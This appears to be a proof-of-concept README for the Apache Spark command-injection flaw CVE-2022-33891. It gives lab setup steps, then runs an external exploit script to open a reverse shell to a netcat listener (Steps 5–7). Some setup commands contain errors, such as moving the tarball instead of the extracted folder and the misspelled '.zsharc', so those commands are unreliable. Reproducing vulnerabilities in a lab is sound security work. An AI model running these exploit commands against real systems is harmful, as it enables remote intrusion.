来源

关联漏洞

介绍

# CVE-2022–33891 — Apache Spark Shell Command Injection Vulnerability

# Impacted Versions - This security issue impacts Apache Spark versions 3.0.3 and earlier, Versions 3.1.1 to 3.1.2, Versions 3.2.0 to 3.2.1.

# Proof of Concept (PoC)

STEP 1:
Install OPENJDK of version 11 with commands – 
sudo apt-get update

sudo apt-get install openjdk-11-jdk

java -version
 
STEP 2:
Install SCALA of version 3.1.3

Download TAR file from GitHub - https://github.com/lampepfl/dotty/releases/tag/3.1.3

Extract the TAR file with commands – 

cd Downloads

tar xvf {scala filename}

sudo su

mv {scala filename}  /usr/local/scala

exit

export PATH=$PATH:/usr/local/scala/bin

scala -version
 
STEP 3:
Install Apache Spark

LINK - https://archive.apache.org/dist/spark/spark-3.1.1/

FILE - spark-3.1.1-bin-hadoop2.7.tgz

Commands – 

tar xvf spark-3.1.1-bin-hadoop2.7.tgz

mv spark-3.1.1-bin-hadoop2.7.tgz /usr/local/spark

exit

sudo nano ~/.zsharc

export PATH=$PATH:/usr/local/spark/bin (Add command in the file)

source ~/.zsharc

spark-shell

Exit the Shell – Using Ctrl + C

STEP 4:
Enable ACL with commands – 

cd /usr/local/spark/conf

cp spark-defaults.conf.template spark-defaults.conf

echo "spark.acls.enable       true" >> spark-defaults.conf

cat spark-defaults.conf

cd /usr/local/spark

cd sbin

./start-master.sh

spark-shell
 
STEP 5:
Download the exploit zip file - https://github.com/HuskyHacks/cve-2022-33891

Unzip the file,

Run the Commands – 

cd Downloads/cve-2022-33891-main

python3 poc.py -u http://192.168.154.128 -p 8080 --check –verbose

STEP 6:
Install Netcat – traditional using the command – 

sudo apt install netcat-traditional

STEP 7:
Run the exploit using these commands in different terminals – 

In first shell - nc -lvp 9001

In second shell - python3 poc.py -u http://192.168.154.128 -p 8080 --revshell -lh 192.168.154.128 -lp 9001 –verbose

文件快照

 [4.0K]  /data/pocs/63bcc7232c8acf6b93363065b1241fa12e729704
└── [1.9K]  README.md

0 directories, 1 file

备注